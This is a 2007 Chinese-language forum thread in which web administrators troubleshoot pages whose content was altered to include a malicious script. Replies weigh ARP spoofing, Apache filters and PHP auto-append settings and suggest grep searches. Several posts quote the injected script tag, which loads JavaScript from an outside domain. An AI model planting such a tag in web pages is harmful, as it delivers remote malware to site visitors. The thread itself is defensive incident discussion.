今天出现了奇怪的问题，网页病毒

artou

我的情况和你有点不同，我是网页里有个链接地址被修改了。但本机正常，apache换端口访问正常，同一网段其它机器访问正常。在这里和linuxsir发帖，都无人回答，最终也没查出问题。。。

hq22

原帖由 飘雪心辰 于 2007-1-29 15:44 发表于 20楼  
============================
你的php不是配置成自动附加某一文件的话 ，你的这段调用js的代码恳定是在你服务器上的。
楼主呀，我就算是代表我们这一些人，能不能把你的这张病毒网页地址发给偶们这帮人瞧瞧。 ...

现在想起来了，是这个地址
<script src=http://waigua9999.com/1.js></script>
申明：浏览前请确保自己的电脑不被感染病毒，由此造成的损失与我无关。

jd_chen

原帖由 hq22 于 2007-1-29 16:01 发表于 22楼  


现在想起来了，是这个地址
<script src=http://waigua9999.com/1.js></script>
申明：浏览前请确保自己的电脑不被感染病毒，由此造成的损失与我无关。

我的机子,卡吧开这个网页,不怕吧?

skylove

原帖由 hq22 于 2007-1-29 16:01 发表于 22楼  


现在想起来了，是这个地址
<script src=http://waigua9999.com/1.js></script>
申明：浏览前请确保自己的电脑不被感染病毒，由此造成的损失与我无关。

您给的这个url的ip是来自 61.152.114.102 ，请核对是否与您的租用主机在同一主机上？或者同一段ip内？？？ 如果是的话，在server上动了手脚地可能性粉大；

如果不是，那么能否说说您的web构成：比如server那边是使用什么脚本语言，或者如果是静态html的话是否存在从数据库里取广告，或者取第三方数据/js调用的情形？？？

skylove

访问了那页面。。。最后出来个。。。


锄禾日当午

hq22

原帖由 skylove 于 2007-1-29 18:17 发表于 24楼  


您给的这个url的ip是来自 61.152.114.102 ，请核对是否与您的租用主机在同一主机上？或者同一段ip内？？？ 如果是的话，在server上动了手脚地可能性粉大；

如果不是，那么能否说说您的web构成：比如serv ...

我的ip段是202.，跟他无关，网页文件是我写的，没有你说的任何可能，我基本确定不是网页文件原因，要么是网络传输过程中添加的，要么是服务器被开了什么进程，等访问网页时候自动添加上去的。

platinum

问一下楼主，这个现象还有可能重现吗？
另外，apache 的日志里有什么敏感信息没有，包括 access 和 error 里面，在发现有病毒的时间前？

artou

经过测试使用Ext_Filter可以达到修改网页任何部分的功能，但是必须修改apache的conf来达到，如果conf未被修改，那是怎么达到的呢？

xmbbx

同网段中有别的电脑中病毒了,造成类似arp欺骗的情况,前段时间我们也出现这个问题,主机是托管的,让IDC去查,没多久就解决了.

飘雪心辰

==================
你可对准网站目录，先检索里面有没直接包含此文件的页面。
比如检索/var/www/html/目录：

1. 
   
2. grep -Ri '1.js' /var/www/html/
   
3. grep -Ri '9999' /var/www/html/
   
4. grep -Ri 'waigua' /var/www/html/
   

复制代码

有没结果。
你用php,那php的配置文件里面这两 语句后面有没什么东东：

; Automatically add files before or after any PHP document.
auto_prepend_file =
auto_append_file =